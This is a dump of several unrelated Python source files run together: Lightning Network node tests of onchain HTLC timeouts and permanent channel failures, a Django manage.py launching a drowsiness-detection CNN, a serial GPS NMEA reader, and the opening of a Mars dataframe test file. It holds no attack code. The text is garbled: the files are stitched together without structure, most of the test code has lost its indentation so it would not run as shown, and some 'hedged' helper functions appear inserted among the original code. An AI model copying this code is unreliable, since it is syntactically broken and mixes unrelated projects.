# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
    # l1 and l7 ignore any HTLCs they're sent.
    # For each direction, we create these HTLCs with the same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
    # We send the second HTLC from a different node, since a node refuses to
    # send multiple HTLCs with the same payment hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
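# Hedged aside (illustration only, not used by the tests): the payment_hash
# returned by invoice() above is the SHA256 digest of the 32-byte preimage,
# so it can be recomputed locally from the preimage hex.
def _example_payment_hash(preimage_hex="0" * 64):
    import hashlib
    return hashlib.sha256(bytes.fromhex(preimage_hex)).hexdigest()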
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    # At depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
    # Check that all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = txout['scriptPubKey']['addresses'][0]
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@unittest.skipIf(not DEVELOPER, "needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind):
l1 = node_factory.get_node(start=False)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
l1.rpc.close(l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'received ERROR.*scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'received ERROR.*scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, 1 for the channel final address,
# which are discarded as the 'scratch' tx that the fundchannel
# plugin makes, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 3])['addresses'][-1]
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
|
manage.py
|
#!/usr/bin/env python
"""
Copyright (c) 2019 - present AppSeed.us
"""
import os
import sys
from multiprocessing import Process
from detectDrowsiness import cnn
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
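# Hedged sketch (not part of the original file): Django's autoreloader re-executes
# the server process and sets RUN_MAIN=true in the reloaded child, so a guard like
# this is one way to avoid spawning the CNN worker twice under runserver.
def should_start_background_worker():
    """Return True only in the process that should own the background worker."""
    return os.environ.get('RUN_MAIN') != 'true'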
if __name__ == '__main__':
    # For 'runserver', run Django and the drowsiness-detection CNN in separate
    # processes; any other management command runs normally. Guard against being
    # invoked with no arguments, which would otherwise raise an IndexError.
    if len(sys.argv) > 1 and sys.argv[1] == 'runserver':
        p1 = Process(target=main)
        p2 = Process(target=cnn)
        p1.start()
        p2.start()
        p2.join()
    else:
        main()
|
__init__.py
|
import serial
import pynmea2
import threading
ser = None
lock = threading.Lock()
thread = None
running = False  # set by start()/stop() to control the background reader thread
gga = None
gsa = None
gsv = None
rmc = None
def get_gga():
with lock:
return gga
def __set_gga(val):
global gga
gga = val
def get_gsa():
with lock:
return gsa
def __set_gsa(val):
global gsa
gsa = val
def get_gsv():
with lock:
return gsv
def __set_gsv(val):
global gsv
gsv = val
def get_rmc():
with lock:
return rmc
def __set_rmc(val):
global rmc
rmc = val
def start(device):
    global ser
    global thread
    global running
ser = serial.Serial(device, 19200, timeout=1)
ser.write(str.encode("AT+CGNSPWR=1\n")) # turn on the power for GPS
# TODO: figure out if/why this is needed
ser.write(str.encode("AT+CGNSSEQ=\"RMC\"\n")) # define the last NMEA sentence that parsed
ser.write(str.encode("AT+CGNSTST=1\n")) # start gps streaming to serial
    running = True

    def read_data():
        # Parse NMEA sentences from the serial stream and hand each recognised
        # sentence type to its setter, until stop() clears the running flag.
        handlers = {
            "$GNGGA": __set_gga,
            "$GPGSA": __set_gsa,
            "$GPGSV": __set_gsv,
            "$GNRMC": __set_rmc,
        }
        while running:
            line = ser.read_until(str.encode("\n")).decode()
            if line[:6] in handlers:
                with lock:
                    handlers[line[:6]](pynmea2.parse(line))
thread = threading.Thread(target=read_data)
thread.daemon = True
thread.start()
def stop():
    # threading.Thread has no stop(); signal the reader loop to exit, turn off
    # GPS streaming, then wait briefly for the daemon thread to finish.
    global running
    running = False
    with lock:
        if ser is not None:
            ser.write(str.encode("AT+CGNSTST=0\n"))  # stop gps streaming to serial
    if thread is not None:
        thread.join(timeout=2)
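# Hedged usage sketch (not part of the original module): a minimal polling loop
# that prints valid RMC fixes. It assumes start() was already called with a working
# device; pynmea2 RMC objects expose status ('A' = valid) and latitude/longitude.
def example_print_fixes(poll_seconds=1.0, max_polls=10):
    import time
    for _ in range(max_polls):
        fix = get_rmc()
        if fix is not None and getattr(fix, "status", None) == "A":
            print(fix.latitude, fix.longitude)
        time.sleep(poll_seconds)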
|
test_local.py
|
# Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import os
import threading
import tempfile
import time
import uuid
import numpy as np
import pandas as pd
import pytest
try:
import vineyard
except ImportError:
vineyard = None
from .... import dataframe as md
from .... import tensor as mt
